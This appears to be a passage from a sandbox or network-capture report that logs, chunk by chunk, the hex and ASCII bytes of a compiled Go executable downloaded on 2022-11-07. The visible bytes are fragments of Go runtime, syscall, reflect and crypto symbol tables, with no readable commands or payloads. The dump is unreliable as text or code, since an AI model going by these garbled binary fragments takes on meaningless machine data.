2022-11-07 22:48:54 UTC	3568	IN	Data Raw: 6e 74 69 6e 74 00 02 1a 30 26 2f 01 30 23 2f 07 00 88 01 6b 00 a8 03 24 02 0a 08 09 02 0a 07 19 02 0a 05 07 00 00 09 01 07 02 04 01 02 02 0e 01 45 02 02 00 00 32 02 32 01 07 00 00 00 c0 aa 43 00 00 00 00 00 70 43 03 00 08 00 00 00 00 00 00 00 81 43 03 00 91 43 03 00 96 43 03 00 02 00 00 00 00 00 00 02 ba 43 03 00 ca 43 03 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 70 72 69 6e 74 68 65 78 00 02 26 90 02 ce 01 8f 02 01 90 02 1e 8f 02 0a 00 88 01 9d 02 00 b8 03 36 04 28 04 12 0a 04 07 03 01 05 02 16 02 06 0a 08 02 0b 02 04 02 0b 02 2b 02 10 03 10 03 0e 17 0a 00 00 09 01 07 02 09 01 06 02 17 01 e2 01 02 05 00 00 de 01 02 35 01 0a 00 00 00 00 00 00 00 e0 ab 43 00 00 00 00 00 18 44 03 00 08 00 00 00 00 00 00 00 68 9a 01 00 2d 44 Data Ascii: ntint0&/0#/k$E22CpCCCCCCooruntime.printhex&6(+5CDh-D
2022-11-07 22:48:54 UTC	3584	IN	Data Raw: 00 00 00 00 00 80 12 44 00 00 00 00 00 58 83 03 00 08 00 00 00 00 00 00 00 b7 83 03 00 ce 83 03 00 0d 84 03 00 03 00 00 00 00 00 00 05 e5 84 03 00 f5 84 03 00 0e 85 03 00 00 00 00 00 84 c9 6f 00 00 00 00 00 b4 be 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 87 72 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 69 6e 6a 65 63 74 67 6c 69 73 74 00 72 75 6e 74 69 6d 65 2e 67 6c 6f 62 72 75 6e 71 70 75 74 00 72 75 6e 74 69 6d 65 2e 67 6c 6f 62 72 75 6e 71 70 75 74 62 61 74 63 68 00 72 75 6e 74 69 6d 65 2e 28 2a 67 51 75 65 75 65 29 2e 70 75 73 68 42 61 63 6b 41 6c 6c 00 02 1e b0 01 d1 03 af 01 01 b0 01 8c 01 af 01 01 b0 01 3c af 01 0c 00 32 74 02 0c 01 39 02 05 01 13 02 05 01 01 02 05 01 2d 02 05 01 01 10 01 02 15 11 0b 02 07 01 57 02 03 01 09 Data Ascii: DXoo@rruntime.injectglistruntime.globrunqputruntime.globrunqputbatchruntime.(*gQueue).pushBackAll<2t9-W
2022-11-07 22:48:54 UTC	3600	IN	Data Raw: 04 0e 5a 00 8a 58 28 02 08 06 10 03 06 0a 09 02 07 04 05 02 0a 05 18 0a 05 02 0c 04 04 8f 58 04 90 58 02 05 14 0a 11 1d 0a 04 1f 09 0a 00 00 5f 02 5e 01 1e 04 0b 03 0a 00 00 92 01 02 04 01 5a 00 00 00 00 00 a0 7d 44 00 00 00 00 00 78 c3 03 00 10 00 00 00 00 00 00 00 85 c3 03 00 90 c3 03 00 93 c3 03 00 01 00 00 00 00 00 00 02 a0 c3 03 00 00 00 00 00 34 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 61 72 67 73 00 02 1a 10 2f 0f 01 10 13 0f 0a 00 36 67 00 7a 22 02 0a 02 15 02 09 01 13 03 0a 00 00 09 01 07 02 04 01 02 02 0c 01 43 02 02 00 00 20 7e 44 00 00 00 00 00 f0 c3 03 00 00 00 00 00 00 00 00 00 05 c4 03 00 12 c4 03 00 16 c4 03 00 02 00 00 00 00 00 00 02 4c c4 03 00 5c c4 03 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 72 75 Data Ascii: ZX(XX_^Z}Dx4ooruntime.args/6gz"C ~DL\ooru
2022-11-07 22:48:54 UTC	3616	IN	Data Raw: 00 00 00 00 00 70 80 73 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 63 6f 6e 63 61 74 73 74 72 69 6e 67 32 00 02 1a 70 51 6f 08 00 80 01 73 00 76 24 02 48 01 07 00 00 49 04 23 03 07 00 00 80 04 45 00 00 00 00 00 80 03 04 00 48 00 00 00 00 00 00 00 96 03 04 00 9d 03 04 00 a1 03 04 00 02 00 00 00 00 00 00 04 08 96 01 00 a8 03 04 00 fc a0 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 90 80 73 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 63 6f 6e 63 61 74 73 74 72 69 6e 67 33 00 02 1a 70 54 6f 08 00 80 01 76 00 7e 24 02 4b 01 07 00 00 49 04 26 03 07 00 00 00 05 45 00 00 00 00 00 00 04 04 00 58 00 00 00 00 00 00 00 16 04 04 00 1d 04 04 00 21 04 04 00 02 00 00 00 00 00 00 04 29 04 04 00 38 04 04 00 8c bc 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 Data Ascii: psruntime.concatstring2pQosv$HI#EHoosruntime.concatstring3pTov~$KI&EX!)8oo
2022-11-07 22:48:54 UTC	3632	IN	Data Raw: 46 35 43 45 44 0a 00 a6 0f 28 a5 08 10 02 04 aa 08 01 a9 08 06 02 0b aa 08 0c 02 01 f1 0a 0c f4 0a 23 02 11 02 01 a7 08 10 02 14 02 0e 04 13 90 08 0a 00 00 85 01 04 51 03 15 00 00 28 02 14 01 01 02 11 01 0d 04 0c 03 35 06 3a 05 15 00 00 00 00 00 00 00 00 40 7d 45 00 00 00 00 00 88 43 04 00 00 00 00 00 00 00 00 00 a2 43 04 00 ad 43 04 00 b1 43 04 00 02 00 00 00 00 00 00 02 19 da 02 00 c1 43 04 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 74 72 61 63 65 47 43 53 77 65 65 70 53 74 61 72 74 00 02 1a 30 4a 2f 01 30 1a 2f 0b 00 7a 8a 01 00 e8 0f 24 06 1b 02 0b 06 11 02 0a 05 1a 09 0b 00 00 79 02 06 01 0b 00 e0 7d 45 00 00 00 00 00 28 44 04 00 08 00 00 00 00 00 00 00 41 44 04 00 4c 44 04 00 53 44 04 00 03 00 00 00 00 00 00 05 25 93 Data Ascii: F5CED(#Q(5:@}ECCCCCooruntime.traceGCSweepStart0J/0/z$y}E(DADLDSD%
2022-11-07 22:48:54 UTC	3648	IN	Data Raw: 00 00 00 00 00 00 00 00 00 48 83 04 00 4f 83 04 00 52 83 04 00 02 00 00 00 00 00 00 02 7c 9a 01 00 5c 83 04 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 67 63 4d 61 72 6b 54 65 72 6d 69 6e 61 74 69 6f 6e 2e 66 75 6e 63 31 00 02 1a 20 20 1f 0d 00 66 47 00 f0 19 28 02 09 10 0a 11 0c 00 00 2c 02 0f 01 0c 00 00 00 00 00 00 20 06 46 00 00 00 00 00 c8 83 04 00 00 00 00 00 00 00 00 00 e8 83 04 00 f4 83 04 00 f8 83 04 00 03 00 00 00 00 00 00 05 8e 67 02 00 24 84 04 00 2f 84 04 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 7c 9f 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 fe 6f 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 67 63 4d 61 72 6b 54 65 72 6d 69 6e 61 74 69 6f 6e 2e 66 75 6e 63 32 00 02 1e 40 70 3f 01 40 96 01 3f Data Ascii: HOR\|\ooruntime.gcMarkTermination.func1 fG(, Fg$/o\|o@oruntime.gcMarkTermination.func2@p?@?
2022-11-07 22:48:54 UTC	3664	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 30 ff 6f 00 00 00 00 00 73 79 6e 63 2f 61 74 6f 6d 69 63 2e 72 75 6e 74 69 6d 65 5f 70 72 6f 63 50 69 6e 00 8a 56 10 02 04 04 06 02 0a 30 06 00 00 54 46 00 00 00 00 00 90 c3 04 00 00 00 00 00 00 00 00 00 1b 34 01 00 91 c2 04 00 ae c3 04 00 03 00 00 00 00 00 00 05 62 ea 03 00 00 00 00 00 9c c2 04 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 ff 6f 00 00 00 00 00 73 79 6e 63 2f 61 74 6f 6d 69 63 2e 72 75 6e 74 69 6d 65 5f 70 72 6f 63 55 6e 70 69 6e 00 9c 56 10 02 0a 30 01 00 00 00 20 54 46 00 00 00 00 00 f8 c3 04 00 10 00 00 00 00 00 00 00 0d c4 04 00 1c c4 04 00 20 c4 04 00 02 00 00 00 00 00 00 02 30 c4 04 00 36 c4 04 00 b8 8e 6f 00 00 00 00 00 b8 8e Data Ascii: 0osync/atomic.runtime_procPinV0TF4booDosync/atomic.runtime_procUnpinV0 TF 06o
2022-11-07 22:48:54 UTC	3680	IN	Data Raw: 00 10 00 00 00 00 00 00 00 c1 16 03 00 4b 02 05 00 28 03 05 00 00 00 00 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 70 61 6e 69 63 53 6c 69 63 65 41 6c 65 6e 55 00 92 1b 05 02 05 02 05 00 80 ac 46 00 00 00 00 00 58 03 05 00 10 00 00 00 00 00 00 00 c1 16 03 00 4b 02 05 00 6f 03 05 00 00 00 00 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 70 61 6e 69 63 53 6c 69 63 65 41 63 61 70 00 9a 1b 05 02 05 02 05 00 00 a0 ac 46 00 00 00 00 00 a0 03 05 00 10 00 00 00 00 00 00 00 c1 16 03 00 4b 02 05 00 b8 03 05 00 00 00 00 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 70 61 6e 69 63 53 6c 69 63 65 41 63 61 70 55 00 a2 1b 05 02 05 02 05 00 c0 ac 46 00 00 00 00 00 e8 03 05 00 10 00 00 00 00 00 00 00 c1 16 03 00 4b 02 05 00 fc 03 05 00 00 00 00 00 00 00 00 00 72 75 6e 74 69 6d 65 2e 70 61 Data Ascii: K(runtime.panicSliceAlenUFXKoruntime.panicSliceAcapFKruntime.panicSliceAcapUFKruntime.pa
2022-11-07 22:48:54 UTC	3696	IN	Data Raw: 08 11 15 14 07 13 e7 09 02 05 02 1a 01 08 02 0e 03 26 10 44 01 08 0d 58 00 00 00 00 00 40 14 47 00 00 00 00 00 70 43 05 00 10 00 00 00 00 00 00 00 8d 75 02 00 eb 43 05 00 ef 43 05 00 03 00 00 00 00 00 00 05 03 44 05 00 00 00 00 00 8e 69 04 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 2d 71 00 00 00 00 00 69 6e 74 65 72 6e 61 6c 2f 72 65 66 6c 65 63 74 6c 69 74 65 2e 6e 61 6d 65 2e 74 61 67 4c 65 6e 00 69 6e 74 65 72 6e 61 6c 2f 72 65 66 6c 65 63 74 6c 69 74 65 2e 6e 61 6d 65 2e 6e 61 6d 65 4c 65 6e 00 69 6e 74 65 72 6e 61 6c 2f 72 65 66 6c 65 63 74 6c 69 74 65 2e 6e 61 6d 65 2e 64 61 74 61 00 69 6e 74 65 72 6e 61 6c 2f 72 65 66 6c 65 63 74 6c 69 74 65 2e 61 64 64 00 dc 01 49 00 94 05 0d Data Ascii: &DX@GpCuCCDiood-qinternal/reflectlite.name.tagLeninternal/reflectlite.name.nameLeninternal/reflectlite.name.datainternal/reflectlite.addI
2022-11-07 22:48:54 UTC	3712	IN	Data Raw: 00 00 00 00 00 e0 71 47 00 00 00 00 00 58 83 05 00 20 00 00 00 00 00 00 00 72 83 05 00 85 83 05 00 8a 83 05 00 03 00 00 00 00 00 00 05 b0 83 05 00 c0 83 05 00 cd 83 05 00 00 00 00 00 b8 ae 6f 00 00 00 00 00 34 bd 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 57 70 00 00 00 00 00 73 79 6e 63 2e 28 2a 70 6f 6f 6c 43 68 61 69 6e 29 2e 70 6f 70 54 61 69 6c 00 02 1e 80 01 c4 01 7f 01 80 01 17 7f 01 80 01 16 7f 0b 00 ec 01 9c 02 00 a0 04 28 02 09 02 09 01 09 02 02 16 0e 75 05 7a 20 08 0d 14 27 0a 09 a7 01 12 a8 01 05 17 17 0b 18 19 17 05 0a 00 00 09 01 07 02 04 01 06 02 f8 01 01 05 02 05 00 00 5c 04 41 02 0f 05 16 06 50 05 0a 00 00 53 02 05 01 5d 04 12 03 55 00 00 73 47 00 00 00 00 00 18 84 05 00 00 00 00 00 00 00 00 00 48 83 04 00 24 84 Data Ascii: qGX ro4oWpsync.(*poolChain).popTail(uz '\APS]UsGH$
2022-11-07 22:48:54 UTC	3728	IN	Data Raw: 2e 46 69 6e 64 00 02 1e a0 01 41 9f 01 02 a0 01 ef 01 9f 01 01 a0 01 26 9f 01 01 a0 01 28 9f 01 0b 00 8e 02 78 27 16 28 ea 01 27 0d 28 26 00 cc 04 3d 06 10 22 2b dd 03 16 c0 03 16 02 07 1c 07 19 17 02 09 06 37 02 05 11 09 1c 0e 21 03 22 02 07 27 07 27 b9 03 0d b2 03 05 09 03 08 14 07 0a 00 00 09 01 07 02 04 01 06 02 87 03 01 05 02 05 00 00 71 04 07 03 42 06 66 01 5c 02 16 01 0f 03 0a 00 00 78 02 16 01 ea 01 02 0d 01 26 00 00 00 00 00 00 00 00 a0 3f 48 00 00 00 00 00 e8 c3 05 00 40 00 00 00 00 00 00 00 1e c4 05 00 2e c4 05 00 33 c4 05 00 03 00 00 00 00 00 00 05 43 c4 05 00 53 c4 05 00 60 c4 05 00 00 00 00 00 94 9f 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 02 70 00 00 00 00 00 73 79 73 63 61 6c 6c 2e 28 2a Data Ascii: .FindA&(x'('(&="+7!"''qBf\x&?H@.3CS`ooxpsyscall.(*
2022-11-07 22:48:54 UTC	3744	IN	Data Raw: 6d 65 6e 74 53 74 72 69 6e 67 73 00 02 1e b0 01 ab 01 af 01 01 b0 01 43 af 01 0a 00 8c 0d 28 02 0c fd 07 01 11 13 02 09 12 09 d9 02 04 d6 0a 39 02 02 02 05 02 02 d9 0c 08 da 0c 0e 0a 14 d7 0c 16 ce 0c 10 04 06 07 02 8d 08 15 8a 08 0a 00 00 39 04 4e 02 17 05 30 08 2a 07 0f 08 06 07 0a 00 00 00 00 00 00 c0 b2 48 00 00 00 00 00 b8 03 06 00 30 00 00 00 00 00 00 00 d7 03 06 00 e7 03 06 00 f4 03 06 00 03 00 00 00 00 00 00 05 20 f0 05 00 2b 04 06 00 3c 04 06 00 00 00 00 00 3c b2 6f 00 00 00 00 00 f0 bb 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 20 d3 73 00 00 00 00 00 78 e0 70 00 00 00 00 00 73 79 73 63 61 6c 6c 2e 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 00 02 1e d0 01 d8 01 cf 01 01 d0 01 4f cf 01 0a 00 9c 02 34 0d 2a 0e d0 01 0d 18 0e Data Ascii: mentStringsC(99N0H0 +<<oo sxpsyscall.GetEnvironmentVariableO4
2022-11-07 22:48:54 UTC	3760	IN	Data Raw: 02 05 06 13 0a 0f 02 24 01 02 21 07 04 05 02 05 0a 02 08 1b 08 0a 00 00 98 01 04 38 03 0a 00 00 2b 02 05 02 16 01 27 01 35 04 11 01 1d 01 0a 00 00 00 00 00 00 60 38 49 00 00 00 00 00 88 43 06 00 10 00 00 00 00 00 00 00 d0 42 06 00 db 42 06 00 9e 43 06 00 03 00 00 00 00 00 00 05 eb d5 05 00 0a 43 06 00 12 43 06 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 0c 9d 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 90 6a 73 00 00 00 00 00 bc 58 70 00 00 00 00 00 69 6e 74 65 72 6e 61 6c 2f 74 65 73 74 6c 6f 67 2e 4f 70 65 6e 00 76 28 02 03 1f 05 19 07 02 0f 18 0f 02 05 06 13 18 0f 02 24 01 02 2f 07 04 05 02 05 0a 02 08 1b 16 0a 00 00 00 00 00 00 00 00 40 39 49 00 00 00 00 00 28 44 06 00 10 00 00 00 00 00 00 00 d0 42 06 00 db 42 06 00 3e 44 06 00 03 00 00 00 00 00 00 05 eb d5 Data Ascii: $!8+'5`8ICBBCCCoojsXpinternal/testlog.Openv($/@9I(DBB>D
2022-11-07 22:48:54 UTC	3776	IN	Data Raw: 02 05 00 00 5f 04 35 03 0a 00 00 29 04 1b 03 09 02 0d 01 33 04 05 01 02 01 0a 00 00 00 60 fb 49 00 00 00 00 00 70 83 06 00 40 00 00 00 00 00 00 00 88 83 06 00 a5 83 06 00 b2 83 06 00 03 00 00 00 00 00 00 05 10 84 06 00 20 84 06 00 33 84 06 00 00 00 00 00 3c 9d 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 73 00 00 00 00 00 58 2f 71 00 00 00 00 00 74 69 6d 65 2e 54 69 6d 65 2e 4d 61 72 73 68 61 6c 42 69 6e 61 72 79 00 02 1e a0 01 b7 02 9f 01 01 a0 01 bf 01 9f 01 01 a0 01 6f 9f 01 01 a0 01 12 9f 01 0d 00 aa 02 bd 03 4b 27 4c 49 4b 27 4c 51 00 f2 11 28 06 05 4d 09 4e 1c 3c 05 df 0f 15 02 14 be 0f 05 02 01 02 18 04 0f 02 0a 02 0a 02 0a 02 0a 02 0a 02 0a 02 03 df 0f 0c e2 0f 09 02 09 02 09 02 03 02 0e 02 03 06 2f e1 0f 05 ba 0f 0a 15 Data Ascii: _5)3`Ip@ 3<oo0sX/qtime.Time.MarshalBinaryoK'LIK'LQ(MN</
2022-11-07 22:48:54 UTC	3792	IN	Data Raw: 2a 70 6f 6c 6c 44 65 73 63 29 2e 63 6c 6f 73 65 00 02 1e 60 96 01 5f 01 60 7e 5f 0b 00 c6 02 38 05 11 06 ab 01 05 19 06 31 00 d6 05 28 02 10 ed 04 11 fc 04 07 02 04 06 05 02 17 0c 0a 03 0d 02 10 02 1e 07 1c 07 23 fb 04 09 02 10 f0 04 05 07 22 03 0a 00 00 61 02 31 02 2b 01 77 01 0a 00 00 38 02 11 01 ab 01 02 19 01 31 00 00 00 c0 89 4a 00 00 00 00 00 c0 c3 06 00 18 00 00 00 00 00 00 00 fa c3 06 00 0a c4 06 00 1e c4 06 00 03 00 00 00 00 00 00 05 4a c4 06 00 5a c4 06 00 69 c4 06 00 00 00 00 00 6c a9 6f 00 00 00 00 00 30 a6 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 5a 70 00 00 00 00 00 69 6e 74 65 72 6e 61 6c 2f 70 6f 6c 6c 2e 28 2a 46 44 29 2e 43 6c 6f 73 65 00 69 6e 74 65 72 6e 61 6c 2f 70 6f 6c 6c 2e 28 2a 70 6f 6c 6c 44 65 73 63 Data Ascii: pollDesc).close`_`~_81(#"a1+w81JJZilo0oZpinternal/poll.(FD).Closeinternal/poll.(*pollDesc
2022-11-07 22:48:54 UTC	3808	IN	Data Raw: 01 03 08 0e 16 02 25 02 09 22 19 1e 4c 04 09 03 0d 06 bf 01 04 19 04 7c 29 29 02 2d 02 09 01 0d 04 bf 01 04 09 02 1e 02 0a 02 0c 02 0c 02 0c 02 0a 02 0a 02 0a 0b 32 02 2b 04 3a 37 12 04 21 02 07 02 09 02 09 02 09 02 07 02 0a 04 32 02 2b 04 3e 32 0b 5d 0a c0 08 19 06 1b 06 12 cf 08 36 05 d9 01 68 1d 6b 0a 00 00 09 01 07 02 14 01 06 02 ed 01 01 1a 02 0c 01 15 02 09 01 15 02 32 01 4d 02 fa 01 01 15 02 09 01 15 02 32 01 27 02 b4 02 01 15 02 09 01 15 02 32 01 27 02 c1 05 01 1b 02 0c 01 15 02 48 01 30 02 1d 01 05 02 05 00 00 9b 01 04 66 02 a2 02 02 18 07 48 0a 3e 02 eb 01 02 a0 01 03 35 06 b8 01 05 8d 01 08 96 01 07 67 0a 99 02 0f d0 01 0a 1b 0d 0a 00 00 80 01 02 0a 01 25 04 31 03 df 08 06 69 05 98 03 04 0b 03 0a 02 46 01 8f 02 04 1d 03 0a 00 00 00 00 00 c0 07 Data Ascii: %"L\|))-2+:7!2+>2]6hk2M2'2'H0fH>5g%1iF
2022-11-07 22:48:54 UTC	3824	IN	Data Raw: 37 8f 01 01 90 01 13 8f 01 01 90 01 38 8f 01 0f 00 fe 02 c5 06 00 9a 01 28 06 18 04 0a 04 0e 0a 06 08 1b 02 10 04 12 02 10 01 08 02 0a 07 08 0c 44 06 08 02 03 01 0c 04 09 01 07 02 08 02 1d 02 14 07 05 06 04 02 34 01 04 05 05 06 05 03 04 02 0a 04 05 02 14 06 13 13 0f 0b 05 0a 22 0e 04 01 04 05 05 06 05 01 0a 01 05 07 05 0a 03 09 05 11 13 09 27 02 13 04 13 09 38 03 14 32 0b 01 0b 01 0b 09 0b 03 0c 27 0f 00 00 09 01 07 02 04 01 06 02 9c 06 01 05 02 0a 00 00 6c 02 91 04 02 b9 01 03 0f 00 00 00 20 91 4b 00 00 00 00 00 f8 43 07 00 20 00 00 00 00 00 00 00 33 44 07 00 4f 44 07 00 60 44 07 00 03 00 00 00 00 00 00 05 3c 60 06 00 90 44 07 00 a2 44 07 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 5d Data Ascii: 78(D4"'82'l KC 3DOD`D<`DDool]
2022-11-07 22:48:54 UTC	3840	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 07 70 00 00 00 00 00 73 74 72 63 6f 6e 76 2e 66 6f 72 6d 61 74 44 69 67 69 74 73 00 02 1e 80 02 c9 01 ff 01 01 80 02 87 02 ff 01 01 80 02 b6 01 ff 01 01 80 02 55 ff 01 01 80 02 8b 02 ff 01 0b 00 a4 03 93 08 00 8c 03 28 02 0a 0a 0e 07 08 02 a0 01 03 02 0a 06 06 2a 14 14 01 12 02 04 07 06 0b 03 1c 99 01 05 0a 01 05 13 03 14 05 12 59 05 03 06 07 c4 05 03 c3 05 3a 05 0a 1f 03 14 03 13 05 2e 9c 01 3b 08 04 0a 04 0d 01 9c 01 09 0a 00 00 09 01 07 02 04 01 06 02 ef 07 01 05 02 05 00 00 b2 01 04 cb 02 03 74 04 b3 01 02 af 01 01 36 03 0a 00 00 e0 04 02 03 01 b0 03 00 00 00 00 e0 24 4c 00 00 00 00 00 20 84 07 00 20 00 00 00 00 00 00 00 36 84 07 00 65 84 07 00 73 84 07 00 03 00 00 00 00 00 00 05 13 85 07 00 23 85 07 00 3c 85 Data Ascii: pstrconv.formatDigitsU(*Y:.;t6$L 6es#<
2022-11-07 22:48:54 UTC	3856	IN	Data Raw: 01 5a 9f 01 01 a0 01 95 01 9f 01 0a 00 ac 03 79 0f 1c 10 83 01 00 80 02 28 02 0f 02 1b 02 05 02 22 bf 01 1c c6 01 73 09 06 03 0a 00 00 09 01 07 02 04 01 06 02 f4 01 01 05 02 05 00 00 5a 02 1f 01 0d 02 88 01 01 0a 00 00 79 02 1c 01 83 01 00 00 00 00 00 00 20 ad 4c 00 00 00 00 00 88 c3 07 00 00 00 00 00 00 00 00 00 94 c3 07 00 9f c3 07 00 a4 c3 07 00 02 00 00 00 00 00 00 02 a9 c3 07 00 bc c3 07 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 63 72 79 70 74 6f 2e 69 6e 69 74 00 02 1a 50 60 4f 01 50 0e 4f 0a 00 ac 03 93 01 00 f8 01 93 01 00 00 09 01 07 02 04 01 02 02 4b 01 10 02 0a 01 13 02 05 00 00 41 02 30 01 22 00 00 00 00 00 00 c0 ad 4c 00 00 00 00 00 08 c4 07 00 10 00 00 00 00 00 00 00 20 c4 07 00 89 21 07 00 87 30 01 00 02 00 00 00 16 00 00 02 8c 21 Data Ascii: Zy("sZy Loocrypto.initP`OPOKA0"L !0!
2022-11-07 22:48:54 UTC	3872	IN	Data Raw: 08 aa 01 13 91 01 05 0d 82 01 02 60 7a 1e 2b 0a bf 1f 0b 17 0c ac 20 15 a3 01 1a 07 71 05 72 03 0d 00 00 09 01 07 02 14 01 06 02 94 07 01 1c 02 be 02 01 26 02 fe 03 01 29 02 6f 01 19 02 c1 01 01 0d 02 16 01 0b 02 93 01 01 0d 02 16 01 0b 02 bb 04 01 05 02 08 00 00 bc 01 02 4d 01 fd 01 04 f0 01 02 76 02 80 01 02 2b 02 7e 01 6f 04 ce 01 02 37 02 3e 02 aa 02 09 d5 01 09 48 08 4e 07 73 08 cd 02 0c bc 02 13 0d 00 00 4d 02 03 01 17 04 07 03 9b 01 06 08 05 07 08 6b 07 05 0a 2c 09 8c 01 0c 08 0b 1e 0c 0e 01 05 02 18 0b b3 04 0e 0d 0d ac 06 0c 0f 04 03 03 25 0b 0d 0c 05 06 04 07 0d 09 13 0a 05 01 55 07 08 08 10 0c 05 13 06 16 44 15 05 16 55 15 08 16 13 15 8f 02 0c 0b 01 0c 0c 0a 0d 0b 07 8a 02 00 00 00 00 00 00 a0 55 4d 00 00 00 00 00 40 04 08 00 18 00 00 00 00 00 Data Ascii: `z+ qr&)oMv+~o7>HNsMk,%UDUUM@
2022-11-07 22:48:54 UTC	3888	IN	Data Raw: 01 9f 01 01 a0 01 8c 01 9f 01 0f 00 ca 2a 28 eb 19 01 ee 19 05 a7 29 12 bc 0f 0a 02 0e 02 0e f2 19 86 01 e9 19 0a 02 08 04 06 da 19 08 02 19 a1 29 0b a4 29 0e 01 0a 02 05 02 18 a5 29 0a aa 29 05 e3 19 03 05 02 0b 04 14 02 06 0c d2 19 05 e9 19 10 12 06 11 0a 1c 4b cc 19 0f 00 00 7e 04 38 02 69 02 9c 01 01 40 05 0f 00 00 28 02 01 01 05 04 12 01 26 01 86 01 02 18 01 21 06 0b 05 35 06 0a 05 05 02 17 01 05 02 6b 01 0f 00 00 00 c7 4d 00 00 00 00 00 e0 43 08 00 38 00 00 00 00 00 00 00 fd 43 08 00 13 44 08 00 3c 44 08 00 03 00 00 00 00 00 00 05 b2 44 08 00 c2 44 08 00 cb 44 08 00 00 00 00 00 ec 9e 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 35 71 00 00 00 00 00 72 65 66 6c 65 63 74 2e 64 65 65 70 56 61 6c 75 65 45 Data Ascii: *()))))K~8i@(&!5kMC8CD<DDDDoo45qreflect.deepValueE
2022-11-07 22:48:54 UTC	3904	IN	Data Raw: 53 74 72 69 6e 67 00 00 00 00 00 00 00 00 ee 4d 00 00 00 00 00 38 83 08 00 10 00 00 00 00 00 00 00 e6 36 01 00 99 ba 07 00 9c ba 07 00 00 00 00 00 16 00 00 02 e4 9d 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 65 66 6c 65 63 74 2e 28 2a 66 75 6e 63 54 79 70 65 46 69 78 65 64 33 32 29 2e 63 6f 6d 6d 6f 6e 00 00 00 00 00 00 00 20 ee 4d 00 00 00 00 00 98 83 08 00 10 00 00 00 00 00 00 00 e6 36 01 00 99 ba 07 00 9c ba 07 00 00 00 00 00 16 00 00 02 e4 9d 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 72 65 66 6c 65 63 74 2e 28 2a 66 75 6e 63 54 79 70 65 46 69 78 65 64 33 32 29 2e 75 6e 63 6f 6d 6d 6f 6e 00 00 00 00 00 40 ee 4d 00 00 00 00 00 f8 83 08 00 10 00 00 00 00 00 00 00 e6 36 01 00 99 ba 07 00 9c ba 07 00 00 00 00 00 16 00 00 02 ac 9c 6f 00 00 00 00 00 c8 8e Data Ascii: StringM86ooreflect.(funcTypeFixed32).common M6ooreflect.(funcTypeFixed32).uncommon@M6o
2022-11-07 22:48:54 UTC	3920	IN	Data Raw: 00 00 00 00 00 a4 c3 08 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 64 70 00 00 00 00 00 63 72 79 70 74 6f 2f 63 69 70 68 65 72 2e 67 63 6d 49 6e 63 33 32 00 65 6e 63 6f 64 69 6e 67 2f 62 69 6e 61 72 79 2e 62 69 67 45 6e 64 69 61 6e 2e 55 69 6e 74 33 32 00 65 6e 63 6f 64 69 6e 67 2f 62 69 6e 61 72 79 2e 62 69 67 45 6e 64 69 61 6e 2e 50 75 74 55 69 6e 74 33 32 00 c4 03 08 02 02 01 02 02 05 01 01 00 bc 05 05 01 03 d5 03 02 d8 03 02 cd 03 02 06 03 c8 03 01 00 00 08 02 02 01 02 04 05 03 01 00 00 60 2d 4e 00 00 00 00 00 10 c4 08 00 40 00 00 00 00 00 00 00 49 c4 08 00 5a c4 08 00 64 c4 08 00 03 00 00 00 00 00 00 05 98 c4 08 00 a8 c4 08 00 bb c4 08 00 00 00 00 00 94 c6 6f 00 00 00 00 00 a4 c8 Data Ascii: oodpcrypto/cipher.gcmInc32encoding/binary.bigEndian.Uint32encoding/binary.bigEndian.PutUint32`-N@IZdo
